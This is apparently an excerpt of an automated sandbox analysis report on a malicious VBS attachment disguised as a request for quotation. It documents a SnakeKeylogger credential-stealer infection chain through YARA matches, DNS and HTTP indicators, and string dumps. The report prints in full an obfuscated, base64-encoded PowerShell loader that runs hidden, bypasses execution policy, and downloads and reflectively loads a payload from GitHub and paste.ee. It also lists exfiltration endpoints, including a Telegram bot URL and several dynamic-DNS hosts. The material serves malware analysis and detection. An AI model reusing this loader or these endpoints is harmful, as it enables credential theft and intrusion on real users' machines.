Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000004.00000002.2453863224.00007FFD34430000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then push ebp 5_2_00417143
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then push ebp 5_2_00416130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then push ebp 5_2_004171D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then push ebp 5_2_004179F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then push ebp 5_2_00417190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then push ebp 5_2_0041725A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then push ebp 5_2_004172E5

Networking

barindex
Source: Network traffic Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49719 -> 188.114.97.3:443
Source: unknown DNS query: name: paste.ee
Source: Yara match File source: 4.2.powershell.exe.22c12cbc703.1.raw.unpack, type: UNPACKEDPE
Source: global traffic HTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /d/FKyid/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 185.199.110.133 185.199.110.133
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /d/FKyid/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: paste.ee
Source: powershell.exe, 00000004.00000002.2416249657.0000022C12CBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: powershell.exe, 00000004.00000002.2416249657.0000022C12CBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: powershell.exe, 00000004.00000002.2416249657.0000022C12CBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: powershell.exe, 00000004.00000002.2416249657.0000022C12CBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: powershell.exe, 00000004.00000002.2416249657.0000022C116D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2401613966.0000022C03008000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2401613966.0000022C01B78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://paste.ee
Source: powershell.exe, 00000004.00000002.2401613966.0000022C01882000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2401613966.0000022C02D3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000002.00000002.2461710510.000001A554290000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2401613966.0000022C01661000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2416249657.0000022C12CBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000004.00000002.2401613966.0000022C02D8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000004.00000002.2401613966.0000022C01882000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2461710510.000001A55424F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2461710510.000001A554263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2401613966.0000022C01661000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2401613966.0000022C01B78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee
Source: powershell.exe, 00000004.00000002.2401613966.0000022C01B78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee;
Source: powershell.exe, 00000004.00000002.2416249657.0000022C12CBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: powershell.exe, 00000004.00000002.2401613966.0000022C01B78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com
Source: powershell.exe, 00000004.00000002.2401613966.0000022C01B78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000004.00000002.2401613966.0000022C03008000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2401613966.0000022C03008000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2401613966.0000022C03008000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2401613966.0000022C01B78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com
Source: powershell.exe, 00000004.00000002.2401613966.0000022C01B78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000004.00000002.2401613966.0000022C01882000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.2401613966.0000022C025CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.2416249657.0000022C116D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2401613966.0000022C03008000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.2401613966.0000022C02D8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000004.00000002.2401613966.0000022C02D8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000004.00000002.2401613966.0000022C01AB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://paste.ee
Source: powershell.exe, 00000004.00000002.2401613966.0000022C01AB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/FKyid/0
Source: powershell.exe, 00000004.00000002.2401613966.0000022C02D39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000004.00000002.2401613966.0000022C025CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2401613966.0000022C01882000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000004.00000002.2401613966.0000022C01882000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Source: powershell.exe, 00000004.00000002.2401613966.0000022C01882000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfmU;
Source: powershell.exe, 00000004.00000002.2416249657.0000022C12CBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: powershell.exe, 00000004.00000002.2401613966.0000022C01B78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.gravatar.com
Source: powershell.exe, 00000004.00000002.2401613966.0000022C01B78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000004.00000002.2401613966.0000022C01B78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000004.00000002.2401613966.0000022C01B78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com;
Source: powershell.exe, 00000004.00000002.2401613966.0000022C01B78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49719 version: TLS 1.2

System Summary

barindex
Source: 4.2.powershell.exe.22c12cbc703.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.powershell.exe.22c12cbc703.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.powershell.exe.22c12cbc703.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.powershell.exe.22c12cbc703.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.powershell.exe.22c12cbc703.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.powershell.exe.22c12cbc703.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.2416249657.0000022C12CBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7092, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4256, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: powershell.exe PID: 4256, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSE9NRVsyMV0rJHBTSE9NZVszNF0rJ3gnKSgoKCdDJysnaVN1cmwgPScrJyBmJysnbVVodHRwczovJysnL3JhdycrJy5nJysnaXQnKydodWJ1JysncycrJ2VyJysnYycrJ28nKydudGVudCcrJy5jb20vTm8nKydEZXRlJysnY3RPbicrJy8nKydObycrJ0RlJysndGVjdE8nKyduL3JlZicrJ3MvJysnaGVhZHMnKycvJysnbWFpJysnbi9EJysnZXQnKydhaCcrJ05vdGgtVi50JysneHQnKydmbVU7IENpU2Jhc2U2NENvJysnbnRlJysnbnQgPSAoTmV3LU8nKydiJysnamVjdCcrJyBTeXN0ZW0uTicrJ2V0LldlYkMnKydsaScrJ2VudCkuJysnRG93bmxvYScrJ2RTJysndHInKydpbmcnKycoQ2knKydTdXInKydsKTsgQycrJ2lTYicrJ2knKyduYScrJ3J5JysnQ28nKydudCcrJ2VudCA9JysnICcrJ1tTeXN0ZScrJ20uQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpJysnbmcoJysnQycrJ2lTYmFzZTY0Q29uJysndGVudCk7JysnIEMnKydpUycrJ2Fzc2VtYicrJ2x5ID0nKycgJysnW1InKydlZmxlY3RpbycrJ24uQXMnKydzZW0nKydibHknKyddOjpMbycrJ2FkKCcrJ0MnKydpU2JpJysnbicrJ2FyeScrJ0MnKydvbnRlbicrJ3QnKycpJysnOyBbZG5saWIuSU8nKycuSG9tZV06OlZBSSgnKydhJysnM1UwL2RpeUtGL2QvZWUuJysnZXQnKydzJysnYXAnKycvLzpzcCcrJ3R0aGEzVSwgYTMnKydVZGVzJysnYScrJ3RpJysndicrJ2EnKydkb2EzVScrJywnKycgYScrJzNVZGUnKydzJysnYXRpdmEnKydkbycrJ2EzJysnVSwgYTNVZGUnKydzYXQnKydpJysndmFkb2EzVSwgYTNVQScrJ2RkJysnSW5QJysncm9jZScrJ3NzMzInKydhM1UsIGEzVWEnKyczVSxhM1VhJysnM1UpJykgLVJFcGxBY2UgIChbQ2hBcl05NytbQ2hBcl01MStbQ2hBcl04NSksW0NoQXJdMzQgLWNyZVBMYUNFICAnZm1VJyxbQ2hBcl0zOSAgLVJFcGxBY2UgIChbQ2hBcl02NytbQ2hBcl0xMDUrW0NoQXJdODMpLFtDaEFyXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSE9NRVsyMV0rJHBTSE9NZVszNF0rJ3gnKSgoKCdDJysnaVN1cmwgPScrJyBmJysnbVVodHRwczovJysnL3JhdycrJy5nJysnaXQnKydodWJ1JysncycrJ2VyJysnYycrJ28nKydudGVudCcrJy5jb20vTm8nKydEZXRlJysnY3RPbicrJy8nKydObycrJ0RlJysndGVjdE8nKyduL3JlZicrJ3MvJysnaGVhZHMnKycvJysnbWFpJysnbi9EJysnZXQnKydhaCcrJ05vdGgtVi50JysneHQnKydmbVU7IENpU2Jhc2U2NENvJysnbnRlJysnbnQgPSAoTmV3LU8nKydiJysnamVjdCcrJyBTeXN0ZW0uTicrJ2V0LldlYkMnKydsaScrJ2VudCkuJysnRG93bmxvYScrJ2RTJysndHInKydpbmcnKycoQ2knKydTdXInKydsKTsgQycrJ2lTYicrJ2knKyduYScrJ3J5JysnQ28nKydudCcrJ2VudCA9JysnICcrJ1tTeXN0ZScrJ20uQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpJysnbmcoJysnQycrJ2lTYmFzZTY0Q29uJysndGVudCk7JysnIEMnKydpUycrJ2Fzc2VtYicrJ2x5ID0nKycgJysnW1InKydlZmxlY3RpbycrJ24uQXMnKydzZW0nKydibHknKyddOjpMbycrJ2FkKCcrJ0MnKydpU2JpJysnbicrJ2FyeScrJ0MnKydvbnRlbicrJ3QnKycpJysnOyBbZG5saWIuSU8nKycuSG9tZV06OlZBSSgnKydhJysnM1UwL2RpeUtGL2QvZWUuJysnZXQnKydzJysnYXAnKycvLzpzcCcrJ3R0aGEzVSwgYTMnKydVZGVzJysnYScrJ3RpJysndicrJ2EnKydkb2EzVScrJywnKycgYScrJzNVZGUnKydzJysnYXRpdmEnKydkbycrJ2EzJysnVSwgYTNVZGUnKydzYXQnKydpJysndmFkb2EzVSwgYTNVQScrJ2RkJysnSW5QJysncm9jZScrJ3NzMzInKydhM1UsIGEzVWEnKyczVSxhM1VhJysnM1UpJykgLVJFcGxBY2UgIChbQ2hBcl05NytbQ2hBcl01MStbQ2hBcl04NSksW0NoQXJdMzQgLWNyZVBMYUNFICAnZm1VJyxbQ2hBcl0zOSAgLVJFcGxBY2UgIChbQ2hBcl02NytbQ2hBcl0xMDUrW0NoQXJdODMpLFtDaEFyXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD341F28F2 4_2_00007FFD341F28F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD341F41FA 4_2_00007FFD341F41FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD341F29F2 4_2_00007FFD341F29F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD341F2EDA 4_2_00007FFD341F2EDA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD341F4EE5 4_2_00007FFD341F4EE5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD341F32F6 4_2_00007FFD341F32F6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD341F0EF2 4_2_00007FFD341F0EF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD341F5BFA 4_2_00007FFD341F5BFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0041F830 5_2_0041F830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_00416130 5_2_00416130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_00422F50 5_2_00422F50
Source: RFQ-5120240930 VENETA PESCA SRL.vbs Initial sample: Strings found which are bigger than 50
Source: 4.2.powershell.exe.22c12cbc703.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.powershell.exe.22c12cbc703.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.powershell.exe.22c12cbc703.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.powershell.exe.22c12cbc703.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
